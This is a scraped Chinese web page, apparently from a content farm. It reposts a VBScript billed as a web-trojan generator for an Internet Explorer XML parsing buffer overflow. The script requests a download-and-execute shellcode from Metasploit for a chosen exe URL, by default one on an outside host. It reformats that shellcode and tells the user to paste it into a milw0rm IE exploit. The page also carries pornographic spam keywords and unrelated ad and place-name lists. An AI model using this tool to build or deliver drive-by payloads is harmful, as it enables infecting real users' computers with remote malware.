婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁(yè) > 知識(shí)庫(kù) > 網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

熱門(mén)標(biāo)簽:墨西哥地圖標(biāo)注app 上海辦理400電話選號(hào) 智云億呼電話機(jī)器人 機(jī)器人打電銷(xiāo)適用于美業(yè)嗎 天津智能外呼系統(tǒng)排名 外呼系統(tǒng)說(shuō)話聲音小怎么辦 龍巖400電話申請(qǐng) 企業(yè)400電話辦理價(jià)錢(qián)低 外呼系統(tǒng)群
'code by lcx

On Error Resume Next
Exeurl = InputBox( "請(qǐng)輸入exe的地址:", "輸入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29MODULE=win32_downloadexecMODE=GENERATEOPT_URL="URLEncoding(Exeurl)"MaxSize=BadChars=0x00+ENCODER=defaultACTION=Generate+Payload"


Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+/div>/pre>)"

Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"/div>/pre>",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function


Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function

Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) HFF Then
strReturn = strReturn ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode 0 Then
innerCode = innerCode + H10000
End If
Hight8 = (innerCode And HFF00)\ HFF
Low8 = innerCode And HFF
strReturn = strReturn "%" Hex(Hight8) "%" Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing

wscript.echo Chr(13)"ok,生成a.txt,請(qǐng)用a.txt里的替換http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1內(nèi)容即可"

標(biāo)簽:錫林郭勒盟 阜新 青島 鄂爾多斯 麗水 黃山 齊齊哈爾 承德

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day》,本文關(guān)鍵詞  網(wǎng)馬生,成器,Internet,Explorer,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day》相關(guān)的同類(lèi)信息!
  • 本頁(yè)收集關(guān)于網(wǎng)馬生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    主站蜘蛛池模板: 肇东市| 历史| 黑水县| 伊金霍洛旗| 桐柏县| 张家界市| 北辰区| 镇康县| 白城市| 淅川县| 六枝特区| 大埔县| 玛曲县| 江华| 田东县| 通山县| 通山县| 唐河县| 洪雅县| 高平市| 长乐市| 防城港市| 景宁| 汶川县| 沁阳市| 湖南省| 河间市| 永吉县| 望城县| 九台市| 嵊泗县| 龙州县| 开原市| 新津县| 大悟县| 茌平县| 桦甸市| 新津县| 北票市| 固始县| 磐安县|